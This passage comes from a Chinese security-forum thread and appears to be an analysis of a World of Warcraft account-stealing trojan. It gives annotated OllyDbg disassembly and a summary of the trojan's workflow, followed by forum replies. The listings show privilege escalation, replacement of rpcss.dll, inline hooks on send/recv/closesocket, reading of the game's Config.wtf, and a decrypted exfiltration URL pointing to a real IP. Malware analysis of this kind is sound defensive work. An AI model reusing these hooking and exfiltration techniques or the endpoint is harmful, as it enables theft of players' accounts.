1000121E |. 57 push edi ; |security
1000121F |. FF15 AC400110 call dword ptr [<&MSVCRT._beginthrea>; \_beginthreadex 创建一个线程,线程作用加载t329076.dll
10001225 |. 83C4 2C add esp, 2C
10001228 |. 50 push eax ; /hObject
10001229 |. FF15 90400110 call dword ptr [<&KERNEL32.CloseHand>; \CloseHandle
1000122F |> 6A 01 push 1
10001231 |. 58 pop eax
10001232 |. 5F pop edi
10001233 |. 5E pop esi
10001234 |. C9 leave
10001235 \. C2 0C00 retn 0C[/code]盗号文件t329076.dll,这里魔兽木马,分析:查找wow.exe,hook API函数,读取\WTF\Config.wtf配置文件的信息,将截取到的游戏账户信息以ULR方式通过以下参数回传到作者地址中[code]100043B7 t>/$ B8 964F0010 mov eax, 10004F96
100043BC |. E8 9F0A0000 call 10004E60
100043C1 |. 837D 0C 01 cmp [arg.2], 1
100043C5 |. 75 44 jnz short 1000440B
100043C7 |. E8 F5D9FFFF call 10001DC1 获取API函数地址
100043CC |. 68 18040000 push 418
100043D1 |. E8 7A0A0000 call <jmp.&MSVCRT.operator new>
100043D6 |. 59 pop ecx
100043D7 |. 8BC8 mov ecx, eax
100043D9 |. 894D 0C mov [arg.2], ecx
100043DC |. 8365 FC 00 and [local.1], 0
100043E0 |. 85C9 test ecx, ecx
100043E2 |. 74 07 je short 100043EB
100043E4 |. E8 49000000 call 10004432
100043E9 |. EB 02 jmp short 100043ED
100043EB |> 33C0 xor eax, eax
100043ED |> FF75 08 push [arg.1]
100043F0 |. 834D FC FF or [local.1], FFFFFFFF
100043F4 |. 8BC8 mov ecx, eax
100043F6 |. A3 D8500110 mov dword ptr [100150D8], eax
100043FB |. E8 89EBFFFF call 10002F89 关键call 6,
10004400 |. FF75 08 push [arg.1] ; /hLibModule
10004403 |. FF15 84600110 call dword ptr [<&KERNEL32.DisableTh>; \DisableThreadLibraryCalls
10004409 |. EB 16 jmp short 10004421
1000440B |> 837D 0C 00 cmp [arg.2], 0
1000440F |. 75 10 jnz short 10004421
10004411 |. 8B0D D8500110 mov ecx, dword ptr [100150D8]
10004417 |. 85C9 test ecx, ecx
10004419 |. 74 06 je short 10004421
1000441B |. 8B01 mov eax, dword ptr [ecx]
1000441D |. 6A 01 push 1
1000441F |. FF10 call dword ptr [eax]
10004421 |> 8B4D F4 mov ecx, [local.3]
10004424 |. 6A 01 push 1
10004426 |. 58 pop eax
10004427 |. 64:890D 0000000>mov dword ptr fs:[0], ecx
1000442E |. C9 leave
1000442F \. C2 0C00 retn 0C[/code]进入关键call 6,[code]10002F89 /$ 55 push ebp
10002F8A |. 8BEC mov ebp, esp
10002F8C |. 81EC 14050000 sub esp, 514
10002F92 |. 8B45 08 mov eax, [arg.1]
10002F95 |. 53 push ebx
10002F96 |. 56 push esi
10002F97 |. 57 push edi
10002F98 |. 8BD9 mov ebx, ecx
10002F9A |. 50 push eax
10002F9B |. A3 B01C0110 mov dword ptr [10011CB0], eax
10002FA0 |. E8 86FDFFFF call 10002D2B
10002FA5 |. 59 pop ecx ; t329076.10000000
10002FA6 |. E8 C4F1FFFF call 1000216F 设置SeDebugPrivilege,提权
10002FAB |. 8B03 mov eax, dword ptr [ebx]
10002FAD |. 8BCB mov ecx, ebx
10002FAF |. FF50 04 call dword ptr [eax+4] 关键call 7,判断是不是wow.exe
10002FB2 |. E8 48FCFFFF call 10002BFF 关键call 8,不知道做什么?
10002FB7 |. BE 28890110 mov esi, 10018928 ; expl9*&orer.exesystem32\t329*.dll
10002FBC |. 8DBD F8FDFFFF lea edi, [local.130]
10002FC2 |. A5 movs dword ptr es:[edi], dword ptr [>
10002FC3 |. A5 movs dword ptr es:[edi], dword ptr [>
10002FC4 |. A5 movs dword ptr es:[edi], dword ptr [>
10002FC5 |. A5 movs dword ptr es:[edi], dword ptr [>
10002FC6 |. 6A 3D push 3D
10002FC8 |. 33C0 xor eax, eax
10002FCA |. 59 pop ecx
10002FCB |. 8DBD 08FEFFFF lea edi, [local.126]
10002FD1 |. BE 08500010 mov esi, 10005008
10002FD6 |. F3:AB rep stos dword ptr es:[edi]
10002FD8 |. 56 push esi
10002FD9 |. 8D85 F8FDFFFF lea eax, [local.130]
10002FDF |. 68 08880110 push 10018808 ; 9*&%s\%s
10002FE4 |. 50 push eax
10002FE5 |. E8 E8F7FFFF call 100027D2 字符处理,得到explorer.exe字符串
10002FEA |. 83C4 0C add esp, 0C
10002FED |. 8D85 F8FDFFFF lea eax, [local.130]
10002FF3 |. BF B81D0110 mov edi, 10011DB8 ; C:\Documents and Settings\safe\桌面\OllyICE\LOADDLL.EXE
10002FF8 |. 50 push eax
10002FF9 |. 57 push edi
10002FFA |. FF15 2C1C0110 call dword ptr [10011C2C] ; shlwapi.StrStrIA 当前进程和explorer.exe比较
10003000 |. 85C0 test eax, eax
10003002 |. 74 5B je short 1000305F 比较结果不一样就跳转
10003004 |. 8BCB mov ecx, ebx
10003006 |. E8 B5020000 call 100032C0 关键call 9,建进程快照,找到wow.exe进程并关闭
1000300B |. FF15 94600110 call dword ptr [<&KERNEL32.GetCurren>; [GetCurrentProcessId
10003011 |. 50 push eax ; /<%d>
10003012 |. 68 20890110 push 10018920 ; |t329076expl9*&orer.exesystem32\t329*.dll
10003017 |. 8D85 FCFEFFFF lea eax, [local.65] ; |
1000301D |. 68 18890110 push 10018918 ; |%s%d
10003022 |. 50 push eax ; |s
10003023 |. FF15 90610110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
10003029 |. 8D85 FCFEFFFF lea eax, [local.65]
1000302F |. 33F6 xor esi, esi
10003031 |. 50 push eax
10003032 |. 6A 01 push 1
10003034 |. 56 push esi
10003035 |. E8 2AFCFFFF call 10002C64
1000303A |. 56 push esi ; /pID
1000303B |. 56 push esi ; |flags
1000303C |. 53 push ebx ; |arg
1000303D |. 68 79310010 push 10003179 ; |start = t329076.10003179
10003042 |. 56 push esi ; |stksize
10003043 |. 56 push esi ; |security
10003044 |. 8983 14040000 mov dword ptr [ebx+414], eax ; |
1000304A |. FF15 40610110 call dword ptr [<&MSVCRT._beginthrea>; \_beginthreadex 创建线程1,执行起始地址10003179H
10003050 |. 83C4 34 add esp, 34
10003053 |. 50 push eax
10003054 |. FF15 941C0110 call dword ptr [10011C94] ; kernel32.CloseHandle
1000305A |. E9 88000000 jmp 100030E7
1000305F |> 56 push esi ; /s2
10003060 |. 56 push esi ; |s1
10003061 |. E8 201E0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
10003066 |. 59 pop ecx
10003067 |. 59 pop ecx
10003068 |. FF15 94600110 call dword ptr [<&KERNEL32.GetCurren>; [GetCurrentProcessId
1000306E |. 50 push eax ; /<%d>
1000306F |. 68 20890110 push 10018920 ; |t329076expl9*&orer.exesystem32\t329*.dll
10003074 |. 8D85 FCFEFFFF lea eax, [local.65] ; |
1000307A |. 68 18890110 push 10018918 ; |%s%d
1000307F |. 50 push eax ; |s
10003080 |. FF15 90610110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
10003086 |. 8D85 FCFEFFFF lea eax, [local.65]
1000308C |. 50 push eax
1000308D |. E8 C6EDFFFF call 10001E58 创建一个互斥体,避免重复运行
10003092 |. 83C4 14 add esp, 14
10003095 |. 85C0 test eax, eax
10003097 |. 0F85 D5000000 jnz 10003172
1000309D |. 8D85 FCFEFFFF lea eax, [local.65]
100030A3 |. 50 push eax
100030A4 |. 6A 01 push 1
100030A6 |. 6A 00 push 0
100030A8 |. E8 B7FBFFFF call 10002C64
100030AD |. 8983 14040000 mov dword ptr [ebx+414], eax
100030B3 |. 83C3 04 add ebx, 4
100030B6 |. 83C4 0C add esp, 0C
100030B9 |. 833B 00 cmp dword ptr [ebx], 0
100030BC |. 74 29 je short 100030E7
100030BE |. 8BC3 mov eax, ebx
100030C0 |> 8B00 /mov eax, dword ptr [eax]
100030C2 |. 83C0 04 |add eax, 4
100030C5 |. 50 |push eax
100030C6 |. 57 |push edi
100030C7 |. FF15 2C1C0110 |call dword ptr [10011C2C] ; shlwapi.StrStrIA
100030CD |. 85C0 |test eax, eax
100030CF |. 74 0C |je short 100030DD
100030D1 |. E8 EC0A0000 |call 10003BC2 关键call 10
100030D6 |. 8B0B |mov ecx, dword ptr [ebx]
100030D8 |. E8 15120000 |call 100042F2 创建线程2,把wininet.dll复制为t3wininet.dll,加载t3wininet.dll
100030DD |> 83C3 04 |add ebx, 4
100030E0 |. 8BC3 |mov eax, ebx
100030E2 |. 833B 00 |cmp dword ptr [ebx], 0
100030E5 |.^ 75 D9 \jnz short 100030C0
100030E7 |> 8D85 F0FBFFFF lea eax, [local.260]
100030ED |. 50 push eax ; /Buffer
100030EE |. 68 04010000 push 104 ; |BufSize = 104 (260.)
100030F3 |. FF15 90600110 call dword ptr [<&KERNEL32.GetTempPa>; \GetTempPathA
100030F9 |. 8D85 F0FBFFFF lea eax, [local.260]
100030FF |. 68 10890110 push 10018910 ; /*.~~~
10003104 |. 50 push eax ; |ConcatString
10003105 |. FF15 4C600110 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA
1000310B |. 6A 05 push 5
1000310D |. BE F8880110 mov esi, 100188F8 ; cmd 9*&/c 9*&de9*&l %s
10003112 |. 59 pop ecx
10003113 |. 8DBD F4FCFFFF lea edi, [local.195]
10003119 |. F3:A5 rep movs dword ptr es:[edi], dword p>
1000311B |. 66:A5 movs word ptr es:[edi], word ptr [es>
1000311D |. A4 movs byte ptr es:[edi], byte ptr [es>
1000311E |. 6A 3B push 3B
10003120 |. 33C0 xor eax, eax
10003122 |. 59 pop ecx
10003123 |. 8DBD 0BFDFFFF lea edi, dword ptr [ebp-2F5]
10003129 |. F3:AB rep stos dword ptr es:[edi]
1000312B |. AA stos byte ptr es:[edi]
1000312C |. 68 08500010 push 10005008
10003131 |. 8D85 F4FCFFFF lea eax, [local.195]
10003137 |. 68 08880110 push 10018808 ; 9*&%s\%s
1000313C |. 50 push eax
1000313D |. E8 90F6FFFF call 100027D2
10003142 |. 83C4 0C add esp, 0C
10003145 |. 8D85 F0FBFFFF lea eax, [local.260]
1000314B |. 50 push eax
1000314C |. 8D85 F4FCFFFF lea eax, [local.195]
10003152 |. 50 push eax ; |Format
10003153 |. 8D85 ECFAFFFF lea eax, [local.325] ; |
10003159 |. 50 push eax ; |s
1000315A |. FF15 90610110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
10003160 |. 83C4 0C add esp, 0C
10003163 |. 8D85 ECFAFFFF lea eax, [local.325]
10003169 |. 6A 00 push 0 ; /ShowState = SW_HIDE
1000316B |. 50 push eax ; |CmdLine
1000316C |. FF15 A8600110 call dword ptr [<&KERNEL32.WinExec>] ; \WinExec 删除t329076.dll文件
10003172 |> 5F pop edi
10003173 |. 5E pop esi
10003174 |. 5B pop ebx
10003175 |. C9 leave
10003176 \. C2 0400 retn 4[/code]关键call 7,判断是不是wow.exe[code]1000446B . B8 AA4F0010 mov eax, 10004FAA
10004470 . E8 EB090000 call 10004E60
10004475 . 51 push ecx
10004476 . 56 push esi
10004477 . 8BF1 mov esi, ecx
10004479 . 68 10010000 push 110
1000447E . E8 CD090000 call <jmp.&MSVCRT.operator new>
10004483 . 59 pop ecx
10004484 . 8BC8 mov ecx, eax
10004486 . 894D F0 mov dword ptr [ebp-10], ecx
10004489 . 33C0 xor eax, eax
1000448B . 3BC8 cmp ecx, eax
1000448D . 8945 FC mov dword ptr [ebp-4], eax
10004490 . 74 0A je short 1000449C
10004492 . 68 C08A0110 push 10018AC0 ; ASCII "wow.exe"
10004497 . E8 3A000000 call 100044D6
1000449C > 8B4D F4 mov ecx, dword ptr [ebp-C]
1000449F . 8946 04 mov dword ptr [esi+4], eax
100044A2 . 5E pop esi
100044A3 . 64:890D 0000000>mov dword ptr fs:[0], ecx
100044AA . C9 leave
100044AB . C3 retn[/code]关键call 9,建进程快照,找到wow.exe进程并关闭[code]100032C0 /$ 55 push ebp
100032C1 |. 8BEC mov ebp, esp
100032C3 |. 81EC 14040000 sub esp, 414
100032C9 |. 53 push ebx
100032CA |. 8BD9 mov ebx, ecx
100032CC |. 56 push esi
100032CD |. 57 push edi
100032CE |. 837B 04 00 cmp dword ptr [ebx+4], 0
100032D2 |. 8D73 04 lea esi, dword ptr [ebx+4]
100032D5 |. 74 49 je short 10003320
100032D7 |. 8BC6 mov eax, esi
100032D9 |> 8B00 /mov eax, dword ptr [eax]
100032DB |. 83B8 0C010000 0>|cmp dword ptr [eax+10C], 0
100032E2 |. 74 3C |je short 10003320
100032E4 |. 8D85 ECFBFFFF |lea eax, [local.261]
100032EA |. 50 |push eax
100032EB |. 8B06 |mov eax, dword ptr [esi]
100032ED |. 83C0 04 |add eax, 4
100032F0 |. 50 |push eax
100032F1 |. E8 53ECFFFF |call 10001F49
100032F6 |. 59 |pop ecx
100032F7 |. 85C0 |test eax, eax
100032F9 |. 59 |pop ecx
100032FA |. 7E 1A |jle short 10003316
100032FC |. 8DBD ECFBFFFF |lea edi, [local.261]
10003302 |. 8945 FC |mov [local.1], eax
10003305 |> 8B03 |/mov eax, dword ptr [ebx]
10003307 |. FF37 ||push dword ptr [edi]
10003309 |. 8BCB ||mov ecx, ebx
1000330B |. FF50 08 ||call dword ptr [eax+8] ; TerminateProcess关闭魔兽进程
1000330E |. 83C7 04 ||add edi, 4
10003311 |. FF4D FC ||dec [local.1]
10003314 |.^ 75 EF |\jnz short 10003305
10003316 |> 83C6 04 |add esi, 4
10003319 |. 8BC6 |mov eax, esi
1000331B |. 833E 00 |cmp dword ptr [esi], 0
1000331E |.^ 75 B9 \jnz short 100032D9
10003320 |> 5F pop edi
10003321 |. 5E pop esi
10003322 |. 5B pop ebx
10003323 |. C9 leave
10003324 \. C3 retn[/code]创建线程2线程里面的关键函数[code]1000430F . E8 FAEAFFFF call 10002E0E
10004314 . 85C0 test eax, eax
10004316 . 74 0F je short 10004327
10004318 . 68 D4880110 push 100188D4 ; t3wininet.dll
1000431D . E8 B4D1FFFF call 100014D6 F7进去,在看call 10003BC2地址(call 10)
10004322 . 85C0 test eax, eax
10004324 . 59 pop ecx
10004325 . 75 05 jnz short 1000432C
10004327 > 33C0 xor eax, eax
10004329 > C2 0400 retn 4[/code]关键call 10,代码如下:[code]10003BC2 /$ 55 push ebp
10003BC3 |. 8BEC mov ebp, esp
10003BC5 |. 81EC 94020000 sub esp, 294
10003BCB |. 56 push esi
10003BCC |. 8D85 6CFDFFFF lea eax, [local.165]
10003BD2 |. 57 push edi
10003BD3 |. 50 push eax ; /pWSAData
10003BD4 |. 68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
10003BD9 |. E8 60120000 call <jmp.&WS2_32.#WSAStartup_115> ; \WSAStartup
10003BDE |. 8D85 FCFEFFFF lea eax, [local.65]
10003BE4 |. 50 push eax
10003BE5 |. 68 4C890110 push 1001894C ; system32\t329076.ini
10003BEA |. E8 D9E4FFFF call 100020C8
10003BEF |. 68 08500010 push 10005008
10003BF4 |. 8D85 FCFEFFFF lea eax, [local.65]
10003BFA |. 68 08880110 push 10018808 ; 9*&%s\%s
10003BFF |. 50 push eax
10003C00 |. E8 CDEBFFFF call 100027D2
10003C05 |. BF 20070000 mov edi, 720
10003C0A |. BE B0490110 mov esi, 100149B0 ; ASCII "http://121.10.107.91:8080/dhwow2/fen/dsad47/post.asp"
10003C0F |. 57 push edi
10003C10 |. 8D85 FCFEFFFF lea eax, [local.65]
10003C16 |. 56 push esi
10003C17 |. 50 push eax
10003C18 |. E8 FBE9FFFF call 10002618 打开文件,读取t329076.ini文件内容
10003C1D |. 57 push edi
10003C1E |. 56 push esi
10003C1F |. E8 B5E3FFFF call 10001FD9 ; 解密函数,解出字符http://121.10.107.91:8080/dhwow2/fen/dsad47/post.asp
10003C24 |. 56 push esi ; t329076.100149B0
10003C25 |. E8 5CD9FFFF call 10001586 网络连接
10003C2A |. 83C4 2C add esp, 2C
10003C2D |. 5F pop edi
10003C2E |. 5E pop esi
10003C2F |. C9 leave
10003C30 \. C3 retn[/code]100149B0 68 74 74 70 3A 2F 2F 31 32 31 2E 31 30 2E 31 30 http://121.10.10
100149C0 37 2E 39 31 3A 38 30 38 30 2F 64 68 77 6F 77 32 7.91:8080/dhwow2
100149D0 2F 66 65 6E 2F 64 73 61 64 34 37 2F 70 6F 73 74 /fen/dsad47/post
100149E0 2E 61 73 70 00 .asp.[code]1000258B /$ 53 push ebx
1000258C |. 55 push ebp
1000258D |. 33ED xor ebp, ebp
1000258F |. 56 push esi
10002590 |. 396C24 14 cmp dword ptr [esp+14], ebp
10002594 |. 57 push edi
10002595 |. 7E 75 jle short 1000260C
10002597 |. 8B4424 14 mov eax, dword ptr [esp+14]
1000259B |. BF 08500010 mov edi, 10005008
100025A0 |. 8DB0 37030000 lea esi, dword ptr [eax+337]
100025A6 |> 57 /push edi ; /s2
100025A7 |. 57 |push edi ; |s1
100025A8 |. E8 D9280000 |call <jmp.&MSVCRT.strcmp> ; \strcmp
100025AD |. 59 |pop ecx
100025AE |. 59 |pop ecx
100025AF |. 56 |push esi ; /pModule
100025B0 |. FF15 60600110 |call dword ptr [<&KERNEL32.GetModul>; \GetModuleHandleA
100025B6 |. 57 |push edi ; /s2
100025B7 |. 57 |push edi ; |s1
100025B8 |. 8BD8 |mov ebx, eax ; |
100025BA |. E8 C7280000 |call <jmp.&MSVCRT.strcmp> ; \strcmp
100025BF |. 59 |pop ecx
100025C0 |. 85DB |test ebx, ebx
100025C2 |. 59 |pop ecx
100025C3 |. 75 0D |jnz short 100025D2
100025C5 |. 56 |push esi ; /FileName
100025C6 |. FF15 A0600110 |call dword ptr [<&KERNEL32.LoadLibr>; \LoadLibraryA 加载wininet.dll
100025CC |. 8BD8 |mov ebx, eax
100025CE |. 85DB |test ebx, ebx
100025D0 |. 74 42 |je short 10002614
100025D2 |> 8D86 04010000 |lea eax, dword ptr [esi+104]
100025D8 |. 50 |push eax ; /ProcNameOrOrdinal
100025D9 |. 53 |push ebx ; |hModule
100025DA |. FF15 A4600110 |call dword ptr [<&KERNEL32.GetProcA>; \GetProcAddress 获取API函数地址
100025E0 |. 85C0 |test eax, eax
100025E2 |. 74 30 |je short 10002614
100025E4 |. 8B8E EBFDFFFF |mov ecx, dword ptr [esi-215]
100025EA |. 03C8 |add ecx, eax
100025EC |. 8D86 C9FCFFFF |lea eax, dword ptr [esi-337]
100025F2 |. 50 |push eax
100025F3 |. 898E E7FDFFFF |mov dword ptr [esi-219], ecx
100025F9 |. E8 9DFEFFFF |call 1000249B hook函数,hook了send,recv,closesocket函数
100025FE |. 45 |inc ebp
100025FF |. 81C6 43050000 |add esi, 543
10002605 |. 3B6C24 1C |cmp ebp, dword ptr [esp+1C]
10002609 |. 59 |pop ecx
1000260A |.^ 7C 9A \jl short 100025A6
1000260C |> 6A 01 push 1
1000260E |. 58 pop eax
1000260F |> 5F pop edi
10002610 |. 5E pop esi
10002611 |. 5D pop ebp
10002612 |. 5B pop ebx
10002613 |. C3 retn
10002614 |> 33C0 xor eax, eax
10002616 \.^ EB F7 jmp short 1000260F[/code]进入hook函数,代码如下,下面是跟进的hook send函数:[code]1000249B /$ 53 push ebx
1000249C |. 56 push esi
1000249D |. 8B7424 0C mov esi, dword ptr [esp+C]
100024A1 |. 57 push edi
100024A2 |. 8DBE 26010000 lea edi, dword ptr [esi+126]
100024A8 |. 57 push edi
100024A9 |. 6A 05 push 5
100024AB |. FFB6 1E010000 push dword ptr [esi+11E]
100024B1 |. E8 C0050000 call 10002A76
100024B6 |. FF37 push dword ptr [edi]
100024B8 |. 8D9E 2E020000 lea ebx, dword ptr [esi+22E]
100024BE |. FFB6 1E010000 push dword ptr [esi+11E]
100024C4 |. 53 push ebx
100024C5 |. E8 A0040000 call 1000296A 取函数的前5个字节,保存到木马模块中
100024CA |. 8B86 1A010000 mov eax, dword ptr [esi+11A]
100024D0 |. FF37 push dword ptr [edi]
100024D2 |. 2BC6 sub eax, esi
100024D4 |. C686 2A010000 E8 mov byte ptr [esi+12A], 0E8
100024DB |. 2D 2F010000 sub eax, 12F
100024E0 |. 53 push ebx
100024E1 |. 8986 2B010000 mov dword ptr [esi+12B], eax
100024E7 |. 8D86 2F010000 lea eax, dword ptr [esi+12F]
100024ED |. 50 push eax
100024EE |. E8 77040000 call 1000296A 把刚才保存的5个字节的起始地址赋给寄存器
100024F3 |. 8B07 mov eax, dword ptr [edi]
100024F5 |. 83C4 24 add esp, 24
100024F8 |. C68406 2F010000 E9 mov byte ptr [esi+eax+12F], 0E9
10002500 |. 8B86 1E010000 mov eax, dword ptr [esi+11E] hook地址给eax,这里hook ws2_32.send函数
10002506 |. 8B0F mov ecx, dword ptr [edi]
10002508 |. 2BC6 sub eax, esi eax=71A24C27,esi=10017140,计算hook点到木马模块偏移地址
1000250A |. 2D 34010000 sub eax, 134
1000250F |. 5F pop edi
10002510 |. 89840E 30010000 mov dword ptr [esi+ecx+130], eax 把跳转的偏移保存到地址10017275h,这里内存显示E9 B3 D9 A0 61
10002517 |. 8BC6 mov eax, esi
10002519 |. 2B86 1E010000 sub eax, dword ptr [esi+11E] eax=1001725E ds:[10001725E]=71A24C27,计算木马模块跳回send函数第六个字节的偏移地址
1000251F |. C686 32030000 E9 mov byte ptr [esi+332], 0E9
10002526 |. 05 25010000 add eax, 125
1000252B |. 8986 33030000 mov dword ptr [esi+333], eax 把跳转的偏移保存到地址10017473h,这里内存显示E9 3E 26 5F 9E
10002531 |. 5E pop esi
10002532 |. 5B pop ebx
10002533 \. C3 retn[/code]内存显示内容:
10017270 FF 55 8B EC E9 B3 D9 A0 61
10017472 E9 3E 26 5F 9E ?&_瀢s
把send函数前5个字节保存到木马模块内存内容,这里显示如下:
1001736E 8B FF 55 8B EC 00 00 00 00 00 00 00 00 00 00 00 ?U嬱...........
[100177B7]地址的指令为jmp ws2_32.71A26774,跳转到71A26774
100177B7 - E9 B8EFA061 jmp ws2_32.71A26774
还没有被hook的recv函数头部:
71A2676F ws2_32.recv 8BFF mov edi, edi
71A26771 55 push ebp
71A26772 8BEC mov ebp, esp
71A26774 83EC 10 sub esp, 10
通过hook send,recv,closesocket函数读取信息。
总结下流程:
1.病毒运行后释放动态库文件~358629.~~~和配置文件"C:\system32\t329076.ini",遍历进程,如果发现avp.exe,就拷贝"C:\\system32\rundll32.exe"为同目录下的t329076.exe,并运行t329076.exe,以GetName和病毒路径为参数加载~358629.~~~;否则就直接调用rundll32.exe以同样参数加载~358629.~~~。
2.在~358629.~~~中,设置自己为"SeDebugPrivilege"权限,在explorer.exe进程中创建远程线程,调用sfc_os.#5去掉"C:\system32\rpcss.dll"系统保护,拷贝"C:\system32\rpcss.dll"为同目录下的t3rpcss.dll,拷贝~358629.~~~为rpcss.dll,释放动态库文件"C:\system32\t329111.dll",删除病毒源文件。
3.当rpcss.dll被svchost.exe加载后,就会调用t329076.dll,在t329076.dll中,遍历查找魔兽游戏进程,hook了send,recv,closesocket函数,窃取用户信息。
[attach]32354[/attach] 嘎嘎,学习下了。呵呵 支持新人发病毒分析的文章 看着眼晕。。。。。。。。。。。。 继续加油。。不够详细
看木马的分析再决定加精与否 这么长的代码啊。 木马部分,分析的一般,而且还有几处低级错误,再仔细看看吧。
改完再决定是否加精 [i=s] 本帖最后由 qiang 于 2010-1-29 18:00 编辑 [/i]
补充:截取游戏信息发送。
1000475C . 60 pushad
1000475D . 60 pushad
1000475E . 8BC4 mov eax, esp
10004760 . 83C0 44 add eax, 44
10004763 . 8BDC mov ebx, esp
10004765 . 83C3 0C add ebx, 0C
10004768 . 8903 mov dword ptr [ebx], eax
1000476A . E8 03000000 call 10004772 关键call 11
1000476F . 61 popad
10004770 . 61 popad
10004771 . C3 retn
关键call 11,游戏信息处理,发信
10004772 /$ 56 push esi
10004773 |. E8 21FFFFFF call 10004699 关键call 12 读取配置文件信息
10004778 |. FF7424 20 push dword ptr [esp+20] ; /<%d>
1000477C |. 8B35 90610110 mov esi, dword ptr [<&USER32.wsprint>; |user32.wsprintfA
10004782 |. 68 54CA0110 push 1001CA54 ; |Format = "%d"
10004787 |. 68 0C2E0110 push 10012E0C ; |s = t329076.10012E0C
1000478C |. FFD6 call esi ; \wsprintfA
1000478E |. A1 E8510110 mov eax, dword ptr [100151E8]
10004793 |. C705 C88A0110 0>mov dword ptr [10018AC8], 1
1000479D |. 83C4 0C add esp, 0C
100047A0 |. 8B00 mov eax, dword ptr [eax]
100047A2 |. 83F8 12 cmp eax, 12 ; Switch (cases D..29) 判断游戏大区
100047A5 |. 77 1E ja short 100047C5
100047A7 |. 74 4A je short 100047F3
100047A9 |. 8BC8 mov ecx, eax
100047AB |. 83E9 0D sub ecx, 0D
100047AE |. 74 0E je short 100047BE
100047B0 |. 49 dec ecx
100047B1 |. 74 40 je short 100047F3
100047B3 |. 49 dec ecx
100047B4 |. 74 4B je short 10004801
100047B6 |. 49 dec ecx
100047B7 |. 74 05 je short 100047BE
100047B9 |. 49 dec ecx
100047BA |. 74 3E je short 100047FA
100047BC |. EB 1C jmp short 100047DA
100047BE |> 68 4CCA0110 push 1001CA4C ; Cases D,10 of switch 100047A2
100047C3 |. EB 41 jmp short 10004806
100047C5 |> 8BC8 mov ecx, eax
100047C7 |. 83E9 13 sub ecx, 13
100047CA |. 74 35 je short 10004801
100047CC |. 83E9 11 sub ecx, 11
100047CF |. 74 29 je short 100047FA
100047D1 |. 83E9 03 sub ecx, 3
100047D4 |. 74 1D je short 100047F3
100047D6 |. 49 dec ecx
100047D7 |. 49 dec ecx
100047D8 |. 74 12 je short 100047EC
100047DA |> 50 push eax ; Default case of switch 100047A2
100047DB |. 68 44CA0110 push 1001CA44
100047E0 |. 68 E0220110 push 100122E0
100047E5 |. FFD6 call esi
100047E7 |. 83C4 0C add esp, 0C
100047EA |. EB 26 jmp short 10004812
100047EC |> 68 3CCA0110 push 1001CA3C ; ASCII "十区"; Case 29 of switch 100047A2
100047F1 |. EB 13 jmp short 10004806
100047F3 |> 68 34CA0110 push 1001CA34 ; Cases E,12,27 of switch 100047A2
100047F8 |. EB 0C jmp short 10004806
100047FA |> 68 2CCA0110 push 1001CA2C ; ASCII "五区"; Cases 11,24 of switch 100047A2
100047FF |. EB 05 jmp short 10004806
10004801 |> 68 24CA0110 push 1001CA24 ; ASCII "三区"; Cases F,13 of switch 100047A2
10004806 |> 68 E0220110 push 100122E0 ; |dest = t329076.100122E0
1000480B |. E8 70060000 call <jmp.&MSVCRT.strcpy> ; \strcpy
10004810 |. 59 pop ecx
10004811 |. 59 pop ecx
10004812 |> E8 8BF7FFFF call 10003FA2 关键call 13,发送游戏信息
10004817 |. 5E pop esi
10004818 \. C3 retn
关键call 12
10004699 /$ 55 push ebp
1000469A |. 8BEC mov ebp, esp
1000469C |. 81EC 08010000 sub esp, 108
100046A2 |. 8D85 F8FEFFFF lea eax, [local.66]
100046A8 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
100046AD |. 50 push eax ; |PathBuffer
100046AE |. 6A 00 push 0 ; |hModule = NULL
100046B0 |. FF15 70600110 call dword ptr [<&KERNEL32.GetModule>; \GetModuleFileNameA
100046B6 |. 8D85 F8FEFFFF lea eax, [local.66]
100046BC |. 6A 5C push 5C ; /c = 5C ('\')
100046BE |. 50 push eax ; |s
100046BF |. FF15 04610110 call dword ptr [<&MSVCRT.strrchr>] ; \strrchr
100046C5 |. 59 pop ecx
100046C6 |. 85C0 test eax, eax
100046C8 |. 59 pop ecx
100046C9 |. 0F84 8B000000 je 1000475A
100046CF |. 8020 00 and byte ptr [eax], 0
100046D2 |. 53 push ebx
100046D3 |. 56 push esi
100046D4 |. 57 push edi
100046D5 |. 8D85 F8FEFFFF lea eax, [local.66]
100046DB |. 68 14CA0110 push 1001CA14 ; /src = "\WTF\Config.wtf"
100046E0 |. 50 push eax ; |dest
100046E1 |. E8 28080000 call <jmp.&MSVCRT.strcat> ; \strcat 连接字符串,获得配置文件Config.wtf的路径
100046E6 |. 8D85 F8FEFFFF lea eax, [local.66]
100046EC |. 50 push eax
100046ED |. E8 6CDFFFFF call 1000265E 打开文件,读取游戏信息
100046F2 |. 8BF0 mov esi, eax
100046F4 |. 56 push esi
100046F5 |. E8 56070000 call <jmp.&MSVCRT.operator new>
100046FA |. 56 push esi
100046FB |. 8945 FC mov [local.1], eax
100046FE |. 50 push eax
100046FF |. 8D85 F8FEFFFF lea eax, [local.66]
10004705 |. 50 push eax
10004706 |. E8 0DDFFFFF call 10002618
1000470B |. 8B35 24610110 mov esi, dword ptr [<&MSVCRT.strstr>>; msvcrt.strstr
10004711 |. 68 08CA0110 push 1001CA08 ; /s2 = "realmName"
10004716 |. FF75 FC push [local.1] ; |s1
10004719 |. FFD6 call esi ; \strstr
1000471B |. 83C4 24 add esp, 24
1000471E |. 85C0 test eax, eax
10004720 |. 74 2C je short 1000474E
10004722 |. BF 04CA0110 mov edi, 1001CA04
10004727 |. 57 push edi
10004728 |. 50 push eax
10004729 |. FFD6 call esi
1000472B |. 8BD8 mov ebx, eax
1000472D |. 59 pop ecx
1000472E |. 85DB test ebx, ebx
10004730 |. 59 pop ecx
10004731 |. 74 1B je short 1000474E
10004733 |. 43 inc ebx
10004734 |. 57 push edi
10004735 |. 53 push ebx
10004736 |. FFD6 call esi
10004738 |. 59 pop ecx
10004739 |. 85C0 test eax, eax
1000473B |. 59 pop ecx
1000473C |. 74 10 je short 1000474E
1000473E |. 8020 00 and byte ptr [eax], 0
10004741 |. 68 E4230110 push 100123E4
10004746 |. 53 push ebx
10004747 |. E8 B6D6FFFF call 10001E02
1000474C |. 59 pop ecx
1000474D |. 59 pop ecx
1000474E |> FF75 FC push [local.1]
10004751 |. E8 DC060000 call 10004E32
10004756 |. 59 pop ecx
10004757 |. 5F pop edi
